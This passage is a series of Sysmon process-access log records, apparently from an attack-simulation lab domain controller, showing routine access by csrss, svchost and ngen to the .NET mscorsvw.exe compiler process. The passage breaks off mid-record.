{"EventTime":"2020-08-01 08:05:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:21.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:21.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:21.976\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:21.976","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.085\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.085","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.085\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.085","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.179\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: 